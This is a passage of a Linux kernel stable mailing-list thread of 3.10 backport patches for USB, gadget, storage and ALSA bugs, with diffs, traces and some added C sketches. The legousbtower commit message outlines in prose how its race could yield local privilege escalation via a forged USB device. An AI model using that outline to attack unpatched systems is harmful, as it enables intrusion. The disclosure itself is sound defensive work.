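Starting from a byte that never had the flow-control bit set, the old
and new paths agree, which matches the remark that the bug only showed
up after CRTSCTS had first been enabled.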

Signed-off-by: Konstantin Shkolnyy <konstantin.shkolnyy@gmail.com>
Fixes: 39a66b8d22a3 ("[PATCH] USB: CP2101 Add support for flow control")
[johan: reword commit message ]
Signed-off-by: Johan Hovold <johan@kernel.org>
[johan: backport to 4.4 ]
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/serial/cp210x.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/usb/serial/cp210x.c b/drivers/usb/serial/cp210x.c
index 0093261..d1582d8 100644
--- a/drivers/usb/serial/cp210x.c
+++ b/drivers/usb/serial/cp210x.c
@@ -793,7 +793,7 @@ static void cp210x_set_termios(struct tty_struct *tty,
 		} else {
 			modem_ctl[0] &= ~0x7B;
 			modem_ctl[0] |= 0x01;
-			modem_ctl[1] |= 0x40;
+			modem_ctl[1] = 0x40;
 			dev_dbg(dev, "%s - flow control = NONE\n", __func__);
 		}
 
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 118/319] usb: misc: legousbtower: Fix NULL pointer deference
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (16 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 117/319] USB: serial: cp210x: fix hardware flow-control disable Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 119/319] usb: gadget: function: u_ether: don't starve tx request queue Willy Tarreau
                   ` (200 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Greg Kroah-Hartman, James Patrick-Evans, Willy Tarreau

From: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

commit 2fae9e5a7babada041e2e161699ade2447a01989 upstream.

This patch fixes a NULL pointer dereference caused by a race condition in
the probe function of the legousbtower driver. It re-structures the
probe function to only register the interface after successfully reading
the board's firmware ID.

The probe function does not deregister the usb interface after an error
receiving the device's firmware ID. The device file registered
(/dev/usb/legousbtower%d) may be read/written globally before the probe
function returns. When tower_delete is called in the probe function
(after an r/w has been initiated), core dev structures are deleted while
the file operation functions are still running. If the 0 address is
mappable on the machine, this vulnerability can be used to create a
Local Privilege Escalation exploit via a write-what-where condition by
remapping dev->interrupt_out_buffer in tower_write. A forged USB device
and local program execution would be required for LPE. The USB device
would have to delay the control message in tower_probe and accept
the control urb in tower_open whilst guest code initiated a write to the
device file as tower_delete is called from the error in tower_probe.

This bug has existed since 2003. Patch tested by emulated device.

Reported-by: James Patrick-Evans <james@jmp-e.com>
Tested-by: James Patrick-Evans <james@jmp-e.com>
Signed-off-by: James Patrick-Evans <james@jmp-e.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/misc/legousbtower.c | 35 +++++++++++++++++------------------
 1 file changed, 17 insertions(+), 18 deletions(-)

diff --git a/drivers/usb/misc/legousbtower.c b/drivers/usb/misc/legousbtower.c
index 8089479..c3e9cfc 100644
--- a/drivers/usb/misc/legousbtower.c
+++ b/drivers/usb/misc/legousbtower.c
@@ -953,24 +953,6 @@ static int tower_probe (struct usb_interface *interface, const struct usb_device
 	dev->interrupt_in_interval = interrupt_in_interval ? interrupt_in_interval : dev->interrupt_in_endpoint->bInterval;
 	dev->interrupt_out_interval = interrupt_out_interval ? interrupt_out_interval : dev->interrupt_out_endpoint->bInterval;
 
-	/* we can register the device now, as it is ready */
-	usb_set_intfdata (interface, dev);
-
-	retval = usb_register_dev (interface, &tower_class);
-
-	if (retval) {
-		/* something prevented us from registering this driver */
-		dev_err(idev, "Not able to get a minor for this device.\n");
-		usb_set_intfdata (interface, NULL);
-		goto error;
-	}
-	dev->minor = interface->minor;
-
-	/* let the user know what node this device is now attached to */
-	dev_info(&interface->dev, "LEGO USB Tower #%d now attached to major "
-		 "%d minor %d\n", (dev->minor - LEGO_USB_TOWER_MINOR_BASE),
-		 USB_MAJOR, dev->minor);
-
 	/* get the firmware version and log it */
 	result = usb_control_msg (udev,
 				  usb_rcvctrlpipe(udev, 0),
@@ -991,6 +973,23 @@ static int tower_probe (struct usb_interface *interface, const struct usb_device
 		 get_version_reply.minor,
 		 le16_to_cpu(get_version_reply.build_no));
 
+	/* we can register the device now, as it is ready */
+	usb_set_intfdata (interface, dev);
+
+	retval = usb_register_dev (interface, &tower_class);
+
+	if (retval) {
+		/* something prevented us from registering this driver */
+		dev_err(idev, "Not able to get a minor for this device.\n");
+		usb_set_intfdata (interface, NULL);
+		goto error;
+	}
+	dev->minor = interface->minor;
+
+	/* let the user know what node this device is now attached to */
+	dev_info(&interface->dev, "LEGO USB Tower #%d now attached to major "
+		 "%d minor %d\n", (dev->minor - LEGO_USB_TOWER_MINOR_BASE),
+		 USB_MAJOR, dev->minor);
 
 exit:
 	dbg(2, "%s: leave, return value 0x%.8lx (dev)", __func__, (long) dev);
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 119/319] usb: gadget: function: u_ether: don't starve tx request queue
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (17 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 118/319] usb: misc: legousbtower: Fix NULL pointer deference Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 120/319] USB: serial: cp210x: fix tiocmget error handling Willy Tarreau
                   ` (199 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Felipe Balbi, Willy Tarreau

From: Felipe Balbi <felipe.balbi@linux.intel.com>

commit 6c83f77278f17a7679001027e9231291c20f0d8a upstream.

If we don't guarantee that we will always get an
interrupt at least when we're queueing our very last
request, we could fall into situation where we queue
every request with 'no_interrupt' set. This will
cause the link to get stuck.

The behavior above has been triggered with g_ether
and dwc3.
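
The condition changed by this patch can be looked at in isolation. This
is a sketch only: the function names are hypothetical, and it assumes
that dev->tx_reqs is the list of free (not yet queued) requests, so an
empty list means the request being queued is the last one available.

```c
#include <assert.h>
#include <stdbool.h>

/* Old rule: at high/super speed, interrupt only on every qmult-th request. */
bool no_interrupt_old(bool fast, unsigned int tx_qlen, unsigned int qmult)
{
	assert(qmult != 0);
	return fast ? (tx_qlen % qmult) != 0 : false;
}

/* New rule: never suppress the interrupt when no free requests are left. */
bool no_interrupt_new(bool fast, bool free_reqs_left,
		      unsigned int tx_qlen, unsigned int qmult)
{
	assert(qmult != 0);
	return (fast && free_reqs_left) ? (tx_qlen % qmult) != 0 : false;
}
```

With the old rule, the last available request can be queued with the
interrupt suppressed whenever tx_qlen is not a multiple of qmult; the
new rule always asks for a completion interrupt in that case.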

Reported-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/gadget/u_ether.c | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/drivers/usb/gadget/u_ether.c b/drivers/usb/gadget/u_ether.c
index 4b76124..aad066d 100644
--- a/drivers/usb/gadget/u_ether.c
+++ b/drivers/usb/gadget/u_ether.c
@@ -586,8 +586,9 @@ static netdev_tx_t eth_start_xmit(struct sk_buff *skb,
 
 	/* throttle high/super speed IRQ rate back slightly */
 	if (gadget_is_dualspeed(dev->gadget))
-		req->no_interrupt = (dev->gadget->speed == USB_SPEED_HIGH ||
-				     dev->gadget->speed == USB_SPEED_SUPER)
+		req->no_interrupt = (((dev->gadget->speed == USB_SPEED_HIGH ||
+				       dev->gadget->speed == USB_SPEED_SUPER)) &&
+					!list_empty(&dev->tx_reqs))
 			? ((atomic_read(&dev->tx_qlen) % qmult) != 0)
 			: 0;
 
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 120/319] USB: serial: cp210x: fix tiocmget error handling
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (18 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 119/319] usb: gadget: function: u_ether: don't starve tx request queue Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 121/319] usb: gadget: u_ether: remove interrupt throttling Willy Tarreau
                   ` (198 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Johan Hovold, Willy Tarreau

From: Johan Hovold <johan@kernel.org>

commit de24e0a108bc48062e1c7acaa97014bce32a919f upstream.

The current tiocmget implementation would fail to report errors up the
stack and instead leaked a few bits from the stack as a mask of
modem-status flags.
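
The pattern of the fix, sketched in userspace. Everything prefixed with
fake_ or FAKE_ is a hypothetical stand-in, including the bit values; the
only assumption taken from the description above is that a failed read
leaves the output variable unwritten.

```c
#include <errno.h>

#define FAKE_CONTROL_DTR 0x01
#define FAKE_CONTROL_RTS 0x02
#define FAKE_TIOCM_DTR   0x002
#define FAKE_TIOCM_RTS   0x004

/* Stand-in for the device read: on failure, *out is left untouched. */
int fake_get_config(int fail, unsigned int *out)
{
	if (fail)
		return -EIO;
	*out = FAKE_CONTROL_DTR | FAKE_CONTROL_RTS;
	return 0;
}

int fake_tiocmget(int fail)
{
	unsigned int control;
	int result;

	result = fake_get_config(fail, &control);
	if (result)
		return result;	/* without this, 'control' is read uninitialized */

	return ((control & FAKE_CONTROL_DTR) ? FAKE_TIOCM_DTR : 0)
	     | ((control & FAKE_CONTROL_RTS) ? FAKE_TIOCM_RTS : 0);
}
```

Dropping the early return would turn whatever happened to be on the
stack into the reported flags, which is the leak the commit describes.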

Fixes: 39a66b8d22a3 ("[PATCH] USB: CP2101 Add support for flow control")
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/serial/cp210x.c | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/drivers/usb/serial/cp210x.c b/drivers/usb/serial/cp210x.c
index d1582d8..003f8dd 100644
--- a/drivers/usb/serial/cp210x.c
+++ b/drivers/usb/serial/cp210x.c
@@ -853,7 +853,9 @@ static int cp210x_tiocmget(struct tty_struct *tty)
 	unsigned int control;
 	int result;
 
-	cp210x_get_config(port, CP210X_GET_MDMSTS, &control, 1);
+	result = cp210x_get_config(port, CP210X_GET_MDMSTS, &control, 1);
+	if (result)
+		return result;
 
 	result = ((control & CONTROL_DTR) ? TIOCM_DTR : 0)
 		|((control & CONTROL_RTS) ? TIOCM_RTS : 0)
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 121/319] usb: gadget: u_ether: remove interrupt throttling
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (19 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 120/319] USB: serial: cp210x: fix tiocmget error handling Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 122/319] usb: chipidea: move the lock initialization to core file Willy Tarreau
                   ` (197 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Felipe Balbi, Willy Tarreau

From: Felipe Balbi <felipe.balbi@linux.intel.com>

commit fd9afd3cbe404998d732be6cc798f749597c5114 upstream.

According to Dave Miller "the networking stack has a
hard requirement that all SKBs which are transmitted
must have their completion signalled in a finite
amount of time. This is because, until the SKB is
freed by the driver, it holds onto socket,
netfilter, and other subsystem resources."

In summary, this means that using TX IRQ throttling
for the networking gadgets is, at least, complex and
we should avoid it for the time being.

Reported-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Tested-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Suggested-by: David Miller <davem@davemloft.net>
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/gadget/u_ether.c | 8 --------
 1 file changed, 8 deletions(-)

diff --git a/drivers/usb/gadget/u_ether.c b/drivers/usb/gadget/u_ether.c
index aad066d..ef5c623 100644
--- a/drivers/usb/gadget/u_ether.c
+++ b/drivers/usb/gadget/u_ether.c
@@ -584,14 +584,6 @@ static netdev_tx_t eth_start_xmit(struct sk_buff *skb,
 
 	req->length = length;
 
-	/* throttle high/super speed IRQ rate back slightly */
-	if (gadget_is_dualspeed(dev->gadget))
-		req->no_interrupt = (((dev->gadget->speed == USB_SPEED_HIGH ||
-				       dev->gadget->speed == USB_SPEED_SUPER)) &&
-					!list_empty(&dev->tx_reqs))
-			? ((atomic_read(&dev->tx_qlen) % qmult) != 0)
-			: 0;
-
 	retval = usb_ep_queue(in, req, GFP_ATOMIC);
 	switch (retval) {
 	default:
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 122/319] usb: chipidea: move the lock initialization to core file
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (20 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 121/319] usb: gadget: u_ether: remove interrupt throttling Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 123/319] Fix USB CB/CBI storage devices with CONFIG_VMAP_STACK=y Willy Tarreau
                   ` (196 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Peter Chen, Willy Tarreau

From: Peter Chen <peter.chen@nxp.com>

commit a5d906bb261cde5f881a949d3b0fbaa285dcc574 upstream.

This fixes the dump below, which is triggered when the lock is accessed
in host mode, because the lock is not initialized there.

[   46.119638] INFO: trying to register non-static key.
[   46.124643] the code is fine but needs lockdep annotation.
[   46.130144] turning off the locking correctness validator.
[   46.135659] CPU: 0 PID: 690 Comm: cat Not tainted 4.9.0-rc3-00079-g4b75f1d #1210
[   46.143075] Hardware name: Freescale i.MX6 SoloX (Device Tree)
[   46.148923] Backtrace:
[   46.151448] [<c010c460>] (dump_backtrace) from [<c010c658>] (show_stack+0x18/0x1c)
[   46.159038]  r7:edf52000
[   46.161412]  r6:60000193
[   46.163967]  r5:00000000
[   46.165035]  r4:c0e25c2c

[   46.169109] [<c010c640>] (show_stack) from [<c03f58a4>] (dump_stack+0xb4/0xe8)
[   46.176362] [<c03f57f0>] (dump_stack) from [<c016d690>] (register_lock_class+0x4fc/0x56c)
[   46.184554]  r10:c0e25d24
[   46.187014]  r9:edf53e70
[   46.189569]  r8:c1642444
[   46.190637]  r7:ee9da024
[   46.193191]  r6:00000000
[   46.194258]  r5:00000000
[   46.196812]  r4:00000000
[   46.199185]  r3:00000001

[   46.203259] [<c016d194>] (register_lock_class) from [<c0171294>] (__lock_acquire+0x80/0x10f0)
[   46.211797]  r10:c0e25d24
[   46.214257]  r9:edf53e70
[   46.216813]  r8:ee9da024
[   46.217880]  r7:c1642444
[   46.220435]  r6:edcd1800
[   46.221502]  r5:60000193
[   46.224057]  r4:00000000

[   46.227953] [<c0171214>] (__lock_acquire) from [<c01726c0>] (lock_acquire+0x74/0x94)
[   46.235710]  r10:00000001
[   46.238169]  r9:edf53e70
[   46.240723]  r8:edf53f80
[   46.241790]  r7:00000001
[   46.244344]  r6:00000001
[   46.245412]  r5:60000193
[   46.247966]  r4:00000000

[   46.251866] [<c017264c>] (lock_acquire) from [<c096c8fc>] (_raw_spin_lock_irqsave+0x40/0x54)
[   46.260319]  r7:ee1c6a00
[   46.262691]  r6:c062a570
[   46.265247]  r5:20000113
[   46.266314]  r4:ee9da014

[   46.270393] [<c096c8bc>] (_raw_spin_lock_irqsave) from [<c062a570>] (ci_port_test_show+0x2c/0x70)
[   46.279280]  r6:eebd2000
[   46.281652]  r5:ee9da010
[   46.284207]  r4:ee9da014

[   46.286810] [<c062a544>] (ci_port_test_show) from [<c0248d04>] (seq_read+0x1ac/0x4f8)
[   46.294655]  r9:edf53e70
[   46.297028]  r8:edf53f80
[   46.299583]  r7:ee1c6a00
[   46.300650]  r6:00000001
[   46.303205]  r5:00000000
[   46.304273]  r4:eebd2000
[   46.306850] [<c0248b58>] (seq_read) from [<c039e864>] (full_proxy_read+0x54/0x6c)
[   46.314348]  r10:00000000
[   46.316808]  r9:c0a6ad30
[   46.319363]  r8:edf53f80
[   46.320430]  r7:00020000
[   46.322986]  r6:b6de3000
[   46.324053]  r5:ee1c6a00
[   46.326607]  r4:c0248b58

[   46.330505] [<c039e810>] (full_proxy_read) from [<c021ec98>] (__vfs_read+0x34/0x118)
[   46.338262]  r9:edf52000
[   46.340635]  r8:c0107fc4
[   46.343190]  r7:00020000
[   46.344257]  r6:edf53f80
[   46.346812]  r5:c039e810
[   46.347879]  r4:ee1c6a00
[   46.350447] [<c021ec64>] (__vfs_read) from [<c021fbd0>] (vfs_read+0x8c/0x11c)
[   46.357597]  r9:edf52000
[   46.359969]  r8:c0107fc4
[   46.362524]  r7:edf53f80
[   46.363592]  r6:b6de3000
[   46.366147]  r5:ee1c6a00
[   46.367214]  r4:00020000
[   46.369782] [<c021fb44>] (vfs_read) from [<c0220a4c>] (SyS_read+0x4c/0xa8)
[   46.376672]  r8:c0107fc4
[   46.379045]  r7:00020000
[   46.381600]  r6:b6de3000
[   46.382667]  r5:ee1c6a00
[   46.385222]  r4:ee1c6a00

[   46.387817] [<c0220a00>] (SyS_read) from [<c0107e20>] (ret_fast_syscall+0x0/0x1c)
[   46.395314]  r7:00000003
[   46.397687]  r6:b6de3000
[   46.400243]  r5:00020000
[   46.401310]  r4:00020000

Fixes: 26c696c678c4 ("USB: Chipidea: rename struct ci13xxx variables from udc to ci")
Signed-off-by: Peter Chen <peter.chen@nxp.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/chipidea/core.c | 1 +
 drivers/usb/chipidea/udc.c  | 2 --
 2 files changed, 1 insertion(+), 2 deletions(-)

diff --git a/drivers/usb/chipidea/core.c b/drivers/usb/chipidea/core.c
index 475c9c1..b77badb 100644
--- a/drivers/usb/chipidea/core.c
+++ b/drivers/usb/chipidea/core.c
@@ -381,6 +381,7 @@ static int ci_hdrc_probe(struct platform_device *pdev)
 		return -ENOMEM;
 	}
 
+	spin_lock_init(&ci->lock);
 	ci->dev = dev;
 	ci->platdata = dev->platform_data;
 	if (ci->platdata->phy)
diff --git a/drivers/usb/chipidea/udc.c b/drivers/usb/chipidea/udc.c
index f1cab42..45c8ffa 100644
--- a/drivers/usb/chipidea/udc.c
+++ b/drivers/usb/chipidea/udc.c
@@ -1647,8 +1647,6 @@ static int udc_start(struct ci13xxx *ci)
 	struct device *dev = ci->dev;
 	int retval = 0;
 
-	spin_lock_init(&ci->lock);
-
 	ci->gadget.ops          = &usb_gadget_ops;
 	ci->gadget.speed        = USB_SPEED_UNKNOWN;
 	ci->gadget.max_speed    = USB_SPEED_HIGH;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 123/319] Fix USB CB/CBI storage devices with CONFIG_VMAP_STACK=y
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (21 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 122/319] usb: chipidea: move the lock initialization to core file Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 124/319] ALSA: rawmidi: Fix possible deadlock with virmidi registration Willy Tarreau
                   ` (195 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Petr Vandrovec, Greg Kroah-Hartman, Willy Tarreau

From: Petr Vandrovec <petr@vandrovec.name>

commit 2ce9d2272b98743b911196c49e7af5841381c206 upstream.

Some code (all of it error handling) submits CDBs that are allocated
on the stack.  This breaks the CB/CBI code, which tries to create a
URB directly from the SCSI command buffer; with vmalloced kernel
stacks that buffer happens to be in vmalloced memory.

Let's make a copy of the command in usb_stor_CB_transport().
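
The copy step can be sketched in plain userspace C.  This is only an
illustration, not the driver code: struct xfer_ctx, IOBUF_SIZE and
stage_command() are hypothetical names, the heap buffer merely stands in
for a DMA-capable buffer such as us->iobuf, and the length check is an
addition of the sketch.

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

#define IOBUF_SIZE 64	/* hypothetical size of the transfer buffer */

/* Hypothetical per-device state; iobuf plays the role of a buffer
 * that is known to be safe to hand to the transport. */
struct xfer_ctx {
	unsigned char *iobuf;
};

int xfer_ctx_init(struct xfer_ctx *ctx)
{
	ctx->iobuf = malloc(IOBUF_SIZE);
	return ctx->iobuf ? 0 : -1;
}

void xfer_ctx_destroy(struct xfer_ctx *ctx)
{
	free(ctx->iobuf);
	ctx->iobuf = NULL;
}

/*
 * Copy a command that may live on the caller's stack into the
 * transfer buffer.  Returns the buffer to pass to the transport,
 * or NULL if the command does not fit.
 */
const unsigned char *stage_command(struct xfer_ctx *ctx,
				   const unsigned char *cmnd, size_t len)
{
	if (len > IOBUF_SIZE)
		return NULL;
	memcpy(ctx->iobuf, cmnd, len);
	return ctx->iobuf;
}
```

The caller then passes the returned pointer, never the original
on-stack command, to the transfer routine.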

Signed-off-by: Petr Vandrovec <petr@vandrovec.name>
Acked-by: Alan Stern <stern@rowland.harvard.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/storage/transport.c | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/drivers/usb/storage/transport.c b/drivers/usb/storage/transport.c
index b1d815e..8988b26 100644
--- a/drivers/usb/storage/transport.c
+++ b/drivers/usb/storage/transport.c
@@ -919,10 +919,15 @@ int usb_stor_CB_transport(struct scsi_cmnd *srb, struct us_data *us)
 
 	/* COMMAND STAGE */
 	/* let's send the command via the control pipe */
+	/*
+	 * Command is sometime (f.e. after scsi_eh_prep_cmnd) on the stack.
+	 * Stack may be vmallocated.  So no DMA for us.  Make a copy.
+	 */
+	memcpy(us->iobuf, srb->cmnd, srb->cmd_len);
 	result = usb_stor_ctrl_transfer(us, us->send_ctrl_pipe,
 				      US_CBI_ADSC, 
 				      USB_TYPE_CLASS | USB_RECIP_INTERFACE, 0, 
-				      us->ifnum, srb->cmnd, srb->cmd_len);
+				      us->ifnum, us->iobuf, srb->cmd_len);
 
 	/* check the return code for the command */
 	usb_stor_dbg(us, "Call to usb_stor_ctrl_transfer() returned %d\n",
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 124/319] ALSA: rawmidi: Fix possible deadlock with virmidi registration
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (22 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 123/319] Fix USB CB/CBI storage devices with CONFIG_VMAP_STACK=y Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 125/319] ALSA: timer: fix NULL pointer dereference in read()/ioctl() race Willy Tarreau
                   ` (194 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Takashi Iwai, Willy Tarreau

From: Takashi Iwai <tiwai@suse.de>

commit 816f318b2364262a51024096da7ca3b84e78e3b5 upstream.

When a seq-virmidi driver is initialized, it registers a rawmidi
instance with its callback to create an associated seq kernel client.
Currently this is done entirely within rawmidi's register_mutex context.
Recently it was found that this may lead to a deadlock when another
rawmidi device that is being attached to the sequencer is accessed,
as both open with the same register_mutex.  This was actually
triggered by syzkaller, as Dmitry Vyukov reported:

======================================================
 [ INFO: possible circular locking dependency detected ]
 4.8.0-rc1+ #11 Not tainted
 -------------------------------------------------------
 syz-executor/7154 is trying to acquire lock:
  (register_mutex#5){+.+.+.}, at: [<ffffffff84fd6d4b>] snd_rawmidi_kernel_open+0x4b/0x260 sound/core/rawmidi.c:341

 but task is already holding lock:
  (&grp->list_mutex){++++.+}, at: [<ffffffff850138bb>] check_and_subscribe_port+0x5b/0x5c0 sound/core/seq/seq_ports.c:495

 which lock already depends on the new lock.

 the existing dependency chain (in reverse order) is:

 -> #1 (&grp->list_mutex){++++.+}:
    [<ffffffff8147a3a8>] lock_acquire+0x208/0x430 kernel/locking/lockdep.c:3746
    [<ffffffff863f6199>] down_read+0x49/0xc0 kernel/locking/rwsem.c:22
    [<     inline     >] deliver_to_subscribers sound/core/seq/seq_clientmgr.c:681
    [<ffffffff85005c5e>] snd_seq_deliver_event+0x35e/0x890 sound/core/seq/seq_clientmgr.c:822
    [<ffffffff85006e96>] snd_seq_kernel_client_dispatch+0x126/0x170 sound/core/seq/seq_clientmgr.c:2418
    [<ffffffff85012c52>] snd_seq_system_broadcast+0xb2/0xf0 sound/core/seq/seq_system.c:101
    [<ffffffff84fff70a>] snd_seq_create_kernel_client+0x24a/0x330 sound/core/seq/seq_clientmgr.c:2297
    [<     inline     >] snd_virmidi_dev_attach_seq sound/core/seq/seq_virmidi.c:383
    [<ffffffff8502d29f>] snd_virmidi_dev_register+0x29f/0x750 sound/core/seq/seq_virmidi.c:450
    [<ffffffff84fd208c>] snd_rawmidi_dev_register+0x30c/0xd40 sound/core/rawmidi.c:1645
    [<ffffffff84f816d3>] __snd_device_register.part.0+0x63/0xc0 sound/core/device.c:164
    [<     inline     >] __snd_device_register sound/core/device.c:162
    [<ffffffff84f8235d>] snd_device_register_all+0xad/0x110 sound/core/device.c:212
    [<ffffffff84f7546f>] snd_card_register+0xef/0x6c0 sound/core/init.c:749
    [<ffffffff85040b7f>] snd_virmidi_probe+0x3ef/0x590 sound/drivers/virmidi.c:123
    [<ffffffff833ebf7b>] platform_drv_probe+0x8b/0x170 drivers/base/platform.c:564
    ......

 -> #0 (register_mutex#5){+.+.+.}:
    [<     inline     >] check_prev_add kernel/locking/lockdep.c:1829
    [<     inline     >] check_prevs_add kernel/locking/lockdep.c:1939
    [<     inline     >] validate_chain kernel/locking/lockdep.c:2266
    [<ffffffff814791f4>] __lock_acquire+0x4d44/0x4d80 kernel/locking/lockdep.c:3335
    [<ffffffff8147a3a8>] lock_acquire+0x208/0x430 kernel/locking/lockdep.c:3746
    [<     inline     >] __mutex_lock_common kernel/locking/mutex.c:521
    [<ffffffff863f0ef1>] mutex_lock_nested+0xb1/0xa20 kernel/locking/mutex.c:621
    [<ffffffff84fd6d4b>] snd_rawmidi_kernel_open+0x4b/0x260 sound/core/rawmidi.c:341
    [<ffffffff8502e7c7>] midisynth_subscribe+0xf7/0x350 sound/core/seq/seq_midi.c:188
    [<     inline     >] subscribe_port sound/core/seq/seq_ports.c:427
    [<ffffffff85013cc7>] check_and_subscribe_port+0x467/0x5c0 sound/core/seq/seq_ports.c:510
    [<ffffffff85015da9>] snd_seq_port_connect+0x2c9/0x500 sound/core/seq/seq_ports.c:579
    [<ffffffff850079b8>] snd_seq_ioctl_subscribe_port+0x1d8/0x2b0 sound/core/seq/seq_clientmgr.c:1480
    [<ffffffff84ffe9e4>] snd_seq_do_ioctl+0x184/0x1e0 sound/core/seq/seq_clientmgr.c:2225
    [<ffffffff84ffeae8>] snd_seq_kernel_client_ctl+0xa8/0x110 sound/core/seq/seq_clientmgr.c:2440
    [<ffffffff85027664>] snd_seq_oss_midi_open+0x3b4/0x610 sound/core/seq/oss/seq_oss_midi.c:375
    [<ffffffff85023d67>] snd_seq_oss_synth_setup_midi+0x107/0x4c0 sound/core/seq/oss/seq_oss_synth.c:281
    [<ffffffff8501b0a8>] snd_seq_oss_open+0x748/0x8d0 sound/core/seq/oss/seq_oss_init.c:274
    [<ffffffff85019d8a>] odev_open+0x6a/0x90 sound/core/seq/oss/seq_oss.c:138
    [<ffffffff84f7040f>] soundcore_open+0x30f/0x640 sound/sound_core.c:639
    ......

 other info that might help us debug this:

 Possible unsafe locking scenario:

        CPU0                    CPU1
        ----                    ----
   lock(&grp->list_mutex);
                                lock(register_mutex#5);
                                lock(&grp->list_mutex);
   lock(register_mutex#5);

 *** DEADLOCK ***
======================================================

The fix is simply to move the registration parts in
snd_rawmidi_dev_register() outside of the register_mutex lock.
The lock is needed only to manage the linked list, and it does not
need to cover the whole initialization process.
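
The pattern can be sketched in userspace C with a pthread mutex.  This
is a simplified illustration under assumptions, not the rawmidi code:
struct dev, register_dev(), dev_count() and the two example callbacks
are hypothetical names.  The callback deliberately takes the same mutex
(via dev_count()), which would self-deadlock if register_dev() still
held it.

```c
#include <pthread.h>
#include <stddef.h>

/* Hypothetical device record; 'next' links it into the global list. */
struct dev {
	struct dev *next;
	int (*dev_register)(struct dev *d);	/* may take other locks */
};

static pthread_mutex_t register_mutex = PTHREAD_MUTEX_INITIALIZER;
static struct dev *devices;	/* protected by register_mutex */

/* Caller must hold register_mutex. */
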